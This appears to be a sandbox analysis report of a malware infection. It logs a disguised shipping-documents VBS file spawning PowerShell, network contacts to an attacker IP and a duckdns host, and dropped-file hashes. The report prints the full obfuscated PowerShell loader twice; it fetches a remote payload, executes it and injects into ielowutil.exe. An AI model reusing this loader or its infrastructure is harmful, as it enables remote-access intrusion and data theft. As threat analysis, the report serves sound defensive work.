PID 1236 wrote to memory of 2936 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"

C:\Program Files (x86)\internet explorer\ielowutil.exe

"C:\Program Files (x86)\internet explorer\ielowutil.exe"

C:\Program Files (x86)\internet explorer\ielowutil.exe

"C:\Program Files (x86)\internet explorer\ielowutil.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
LT 91.244.197.9:80 91.244.197.9 tcp
US 8.8.8.8:53 9.197.244.91.in-addr.arpa udp
LT 91.244.197.9:80 91.244.197.9 tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
LT 91.244.197.9:80 91.244.197.9 tcp
US 8.8.8.8:53 septrem.duckdns.org udp
SE 70.34.197.90:2424 septrem.duckdns.org tcp
US 8.8.8.8:53 90.197.34.70.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 73.254.224.20.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

memory/456-133-0x0000028B044E0000-0x0000028B04502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2qupzy0i.tvt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/456-143-0x00007FF837FB0000-0x00007FF838A71000-memory.dmp

memory/456-144-0x0000028B044D0000-0x0000028B044E0000-memory.dmp

memory/456-145-0x0000028B044D0000-0x0000028B044E0000-memory.dmp

memory/456-146-0x0000028B044D0000-0x0000028B044E0000-memory.dmp

memory/1236-148-0x0000000075260000-0x0000000075A10000-memory.dmp

memory/1236-147-0x0000000002DA0000-0x0000000002DD6000-memory.dmp

memory/1236-149-0x0000000002D50000-0x0000000002D60000-memory.dmp

memory/1236-150-0x0000000005870000-0x0000000005E98000-memory.dmp

memory/1236-151-0x00000000057D0000-0x00000000057F2000-memory.dmp

memory/1236-152-0x0000000005EA0000-0x0000000005F06000-memory.dmp

memory/1236-153-0x0000000005F80000-0x0000000005FE6000-memory.dmp

memory/1236-163-0x00000000066C0000-0x00000000066DE000-memory.dmp

memory/456-164-0x00007FF837FB0000-0x00007FF838A71000-memory.dmp

memory/1236-165-0x0000000002D50000-0x0000000002D60000-memory.dmp

memory/1236-166-0x0000000007F30000-0x00000000085AA000-memory.dmp

memory/1236-167-0x0000000006C50000-0x0000000006C6A000-memory.dmp

memory/456-168-0x0000028B044D0000-0x0000028B044E0000-memory.dmp

memory/456-169-0x0000028B044D0000-0x0000028B044E0000-memory.dmp

memory/1236-170-0x0000000007970000-0x0000000007A06000-memory.dmp

memory/1236-171-0x00000000078D0000-0x00000000078F2000-memory.dmp

memory/1236-172-0x0000000008B60000-0x0000000009104000-memory.dmp

memory/456-173-0x0000028B044D0000-0x0000028B044E0000-memory.dmp

memory/1236-174-0x0000000007D80000-0x0000000007D94000-memory.dmp

memory/1236-175-0x0000000075260000-0x0000000075A10000-memory.dmp

memory/1236-176-0x0000000002D50000-0x0000000002D60000-memory.dmp

memory/1236-177-0x0000000002D50000-0x0000000002D60000-memory.dmp

memory/1236-178-0x0000000002D50000-0x0000000002D60000-memory.dmp

memory/1236-180-0x0000000007E20000-0x0000000007E21000-memory.dmp

memory/1236-181-0x0000000009110000-0x000000000B728000-memory.dmp

memory/1236-182-0x0000000009110000-0x000000000B728000-memory.dmp

memory/1236-183-0x0000000077C81000-0x0000000077DA1000-memory.dmp

memory/2936-184-0x0000000001030000-0x0000000003648000-memory.dmp

memory/2936-185-0x0000000001030000-0x0000000003648000-memory.dmp

memory/2936-186-0x0000000077D08000-0x0000000077D09000-memory.dmp

memory/2936-187-0x0000000077C81000-0x0000000077DA1000-memory.dmp

memory/2936-188-0x0000000001030000-0x0000000003648000-memory.dmp

memory/2936-189-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-190-0x0000000001030000-0x0000000003648000-memory.dmp

memory/2936-191-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-193-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-195-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-196-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-197-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-198-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-199-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-200-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-194-0x0000000001030000-0x0000000003648000-memory.dmp

memory/1236-202-0x0000000075260000-0x0000000075A10000-memory.dmp

memory/2936-203-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-204-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-205-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-206-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-207-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-209-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-210-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-211-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-212-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-214-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-213-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-208-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-201-0x0000000000400000-0x000000000062B000-memory.dmp

memory/456-217-0x00007FF837FB0000-0x00007FF838A71000-memory.dmp

memory/2936-221-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-222-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-223-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-224-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-225-0x0000000000400000-0x000000000062B000-memory.dmp

memory/2936-226-0x0000000000400000-0x000000000062B000-memory.dmp

C:\ProgramData\logwes.dat

MD5 0c314d0edb32d0aea5a4dc4667e10293
SHA1 630332f0b6ac756eccce71421b098fc9afe43744
SHA256 0e5bc19931a853ceb0ee503169f558d13b6dbb84126afd568dc202465a687bf1
SHA512 5a9ad264a7ef82525dbccaba345966ed3378bd7334ea55a6f1a237de5ecea142224104dbc37e500b52e7ccaaca8b9f984f386f14ba43df90eb11512c1c5f4f91